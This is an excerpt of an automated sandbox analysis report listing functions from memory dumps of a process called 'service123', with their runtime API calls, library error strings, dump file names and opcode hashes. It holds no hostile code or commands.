Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: 497352d56afb5efcfe81192741420bc082c77fd2683cd2538bd42de673bdd767
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 8C6107B5A09705CFC714DF29C1A061AFBE1AF98754F10892DE89A8BB64E731E844CF52

Function 6C360970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2F92A3,00000003), ref: 6C3609ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2F92A3,00000003), ref: 6C360A2C

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 2abc45f4bb24c91301417d53e0e1c87c643f8ea330f9519f3337d8f76a86c832
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 156102B4509746CFC704DF2AC09051AFBE1AF99358F10891EE8EA8BB65D731E844CF96

Function 6C362B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C35736E), ref: 6C362C03

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C362D14, 6C362D71, 6C362DD6
string::string, xrefs: 6C362DCE
basic_string::_M_create, xrefs: 6C362C1A, 6C362CBA
basic_string::basic_string, xrefs: 6C362D0C, 6C362D69

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: e76d075b6d4cdd295f3533aae30653fa09f71790c9598c500bef1740277e05f3
Instruction ID: bc5dc6563e3382ea650e8d2be397087b239944e43307e85b205067417028b68a
Opcode Fuzzy Hash: e76d075b6d4cdd295f3533aae30653fa09f71790c9598c500bef1740277e05f3
Instruction Fuzzy Hash: 517170B69093508FC300EF2DD48064AFBE0FF89218F558A9EE9889B715D336C855CF92

Function 6C2CEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: 44d37799ca9ca8a1b681062751e828581ff22ddd5db0271cecb9caa6084c8558
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 7561BC757093098FC390DF19C48265AB7E5AF88318F448B2EFC989BB14E730D9468B97

Function 6C2DB060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2DAF3F), ref: 6C395FF0
abort.MSVCRT(?,?,?,?,?,?,6C2DAE9C,?,?,?,?,?,?,6C396040), ref: 6C395FF8
abort.MSVCRT(?,?,?,?,?,?,6C2DAE9C,?,?,?,?,?,?,6C396040), ref: 6C396000
abort.MSVCRT(?,?,?,?,?,?,6C2DAE9C,?,?,?,?,?,?,6C396040), ref: 6C396008

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: c2cf3682ac692371908e0930e4fcb1f0bacdfc6c41323b390f00b90279c23416
Instruction ID: d600d2bbdc4ef5ce7282484dd7e2c59a19ad8388972bc2b1f76dc634555f370c
Opcode Fuzzy Hash: c2cf3682ac692371908e0930e4fcb1f0bacdfc6c41323b390f00b90279c23416
Instruction Fuzzy Hash: 5F41F9716092198BCB00AF74C4D16EA77B1EF9231CF15886DD8858BB15EB32A44ACF92

Function 6C2C1020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6C2C1281,?,?,?,?,?,?,6C2C13AE), ref: 6C2C1057
_amsg_exit.MSVCRT ref: 6C2C1086

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: 0dd620befc5031e4409aad210271787b1d5f3689b35711ac9d20bee02fc2b6ed
Instruction ID: d4da82b87106a69e7fdf7b2dc9ca7463dd247849ccade20007e8bcf82eccfcc5
Opcode Fuzzy Hash: 0dd620befc5031e4409aad210271787b1d5f3689b35711ac9d20bee02fc2b6ed
Instruction Fuzzy Hash: 5931D0703082458BDB90EF2DC58279A77F8FB4A394F01462AED448BA41DB75D8C4CB93

Function 6C2E1F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2E1F18
strlen.MSVCRT ref: 6C2E1F22
memcpy.MSVCRT ref: 6C2E1F3F
setlocale.MSVCRT ref: 6C2E1F52
wcsftime.MSVCRT ref: 6C2E1F76
setlocale.MSVCRT ref: 6C2E1F88

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: d128da8c89c87f91e5b0a1318aaed6f28f10f4ae895011d9cb0b453d80b9fe57
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: B011D6B5509314AFC340BF69C09465EBBE4BF98754F428C2DF8C887710EB78A854CB92

Function 6C2E1C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C2E1C68
strlen.MSVCRT ref: 6C2E1C72
memcpy.MSVCRT ref: 6C2E1C8F
setlocale.MSVCRT ref: 6C2E1CA2
strftime.MSVCRT ref: 6C2E1CC6
setlocale.MSVCRT ref: 6C2E1CD8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: e54749e5b366c87e10dadd63691975bc0cdf8a053d4c8425f0d0d9f92b51589e
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: B611D3B5509314AFC340BF69C09475EBBE4BF98644F428C6DF8C88B701EB78A854CB92

Function 6C2CED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D65
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6A
abort.MSVCRT(?,?,?,?,?,?,6C2CE2F4,?,?,?,?,?,?,00000000,00000001,6C2D008D), ref: 6C396D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2D038F), ref: 6C396D7E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 5b12cc7e70d74df4af8ddcef9b4e896213e0a0a4fa28fbf1949d3d7740b795ee
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: CFB01232EC92BDC5C4A075BC00263DAA21D9B1334CF010A0BDD7673C088A22F1834997

Function 6C2DE0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6C2DE117
LocalFree.KERNEL32 ref: 6C2DE14B

Strings

Unknown error code, xrefs: 6C2DE18C
basic_string: construction from null is not valid, xrefs: 6C2DE1A7

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: 0b7c3a798c3de32f901ecd4f4d55ad742520cd6a3c1952e118841e0074401126
Instruction ID: 00ad8a2f09ecf75220c3c561630c950e0ed276e5b174ff51fc8a5a04aba8ef54
Opcode Fuzzy Hash: 0b7c3a798c3de32f901ecd4f4d55ad742520cd6a3c1952e118841e0074401126
Instruction Fuzzy Hash: D5415CB1A057099BCB40AF69C48669EFBF4FF49718F41892CE99497B10E33094498FD3

Function 6C2D3659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2D3567
fputc.MSVCRT ref: 6C2D35D7
memset.MSVCRT ref: 6C2D3692

Strings

0, xrefs: 6C2D3687
o, xrefs: 6C2D369A

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: f8f8536641e0a707dac9b5209bf94497b4c16ae73adf030f2e362328d7fdd861
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: F2316C72A183098BC700CF68C0807AABBF1BF58315F168659E995ABB41D738F804CB50

Function 006F2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006F2E97
fputc.MSVCRT ref: 006F2F07
memset.MSVCRT ref: 006F2FC2

Strings

0, xrefs: 006F2FB7
o, xrefs: 006F2FCA

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 65aa643b1002188df69d62c7960e62b53fde65cdf642dc13c0a28f2335dd640e
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: 13314A7190431A8FDB10CF68C0A47BABBF2BF58310F258569DA95AB352D738A941CF54

Function 6C2C9490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6C2C94C2
strlen.MSVCRT ref: 6C2C9616

Strings

_GLOBAL_, xrefs: 6C2C94B7

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: 9b5a7fc75ca25951ad561f35592a023f6ad73c149682593c26f7d972ffe9fd5c
Instruction ID: 9ba0ff7329ac9733ea43afeaab7cebaaea95c30722c4b946667116d26ebf7442
Opcode Fuzzy Hash: 9b5a7fc75ca25951ad561f35592a023f6ad73c149682593c26f7d972ffe9fd5c
Instruction Fuzzy Hash: B1F19270E0521D8FEB60DF29C8903DDBBF1AF46308F0442E9D848AB645D7759A99CF82

Function 6C33DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6C35F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35F95D
Part of subcall function 6C35F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35F988

memcpy.MSVCRT ref: 6C33DCB5

Part of subcall function 6C362530: memcpy.MSVCRT(?,-00000001,?,6C2E749E,?,?,?,?,?,?,?,?,?,?,?,6C2E8E25), ref: 6C36256C

Strings

iostream error, xrefs: 6C33DD08
basic_string::append, xrefs: 6C33DDB2, 6C33DDBE
Unknown error, xrefs: 6C33DB08

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: Unknown error$basic_string::append$iostream error
API String ID: 1283327689-1474074352
Opcode ID: ce6150a4326774e03d611ef6ba1d9fd16d2db137d04c648c0350dee9c5f18fce
Instruction ID: 40135468377a525c6cd45194a9dadba93b36d1a260e677a4ecd69f7d63a9f034
Opcode Fuzzy Hash: ce6150a4326774e03d611ef6ba1d9fd16d2db137d04c648c0350dee9c5f18fce
Instruction Fuzzy Hash: B8A106B1D14368CBCB14EFA8C48069DBBF5BF48314F21851ED498AB754E771A845CF92

Function 6C32BF60 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 216COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C32C03F
memcpy.MSVCRT ref: 6C32C099
memcpy.MSVCRT ref: 6C32C127

Part of subcall function 6C32C500: memcpy.MSVCRT ref: 6C32C58C

Strings

basic_string::replace, xrefs: 6C32C194, 6C32C1A7
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C32C1B3

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: b58625cc3b57479192d28299f622ecd6f2bb330d770aad4001938d11504a6813
Instruction ID: 474256c064f8f66a77598e99b553a2d2fe07278d11ac1ee9ff58a0268cea5462
Opcode Fuzzy Hash: b58625cc3b57479192d28299f622ecd6f2bb330d770aad4001938d11504a6813
Instruction Fuzzy Hash: DC813771A056159FCB00EF28D48059EBBE5FF88718F11892DE898DB710E735E954CF92

Function 6C335000 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C3350D0
memcpy.MSVCRT ref: 6C335124
memcpy.MSVCRT ref: 6C3351B8

Part of subcall function 6C335590: memcpy.MSVCRT ref: 6C335620

Strings

basic_string::replace, xrefs: 6C335229, 6C33523C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C335248

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: 0fe0f9f9091ccdff54ab8f1d2e21a82865b36b1954b8c40541728ffd4068f5f3
Instruction ID: 05d3d59c89d8fa97c3c7ff0180e63bc71dbea7157dabea2667d64dd80db04fae
Opcode Fuzzy Hash: 0fe0f9f9091ccdff54ab8f1d2e21a82865b36b1954b8c40541728ffd4068f5f3
Instruction Fuzzy Hash: 10814872A092659FCB00DF6CC48059EFBF5AF88354F118A2EE899D7710E335D9448F92

Function 6C33D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C35F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35F95D
Part of subcall function 6C35F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C33DA2E), ref: 6C35F988

strlen.MSVCRT ref: 6C33D8E5
memcpy.MSVCRT ref: 6C33D9BE

Strings

iostream error, xrefs: 6C33DA12
Unknown error, xrefs: 6C33D85E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: 000a7d52c8695bd83dc9b382564c9a60547d305f761bd80525d4fe6370c94763
Instruction ID: 4e5aeb25958a4234531aa9eb8fe5c0533140a836a880eeb307c2dfbbbb3c8db4
Opcode Fuzzy Hash: 000a7d52c8695bd83dc9b382564c9a60547d305f761bd80525d4fe6370c94763
Instruction Fuzzy Hash: 3361D3B0904358CFDB04DFA8C08469EBBF1BF88314F14892EE8999B755E7759849CF92

Function 6C2E77B1 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2E77D3

Part of subcall function 6C334050: memcpy.MSVCRT(?,?,?,?,-00000001,?,?,6C2E77E6), ref: 6C3340B3

strlen.MSVCRT ref: 6C2E7844
strlen.MSVCRT ref: 6C2E78B2
strlen.MSVCRT ref: 6C2E7926

Strings

@J:l, xrefs: 6C2E77C6, 6C2E78A7

Memory Dump Source

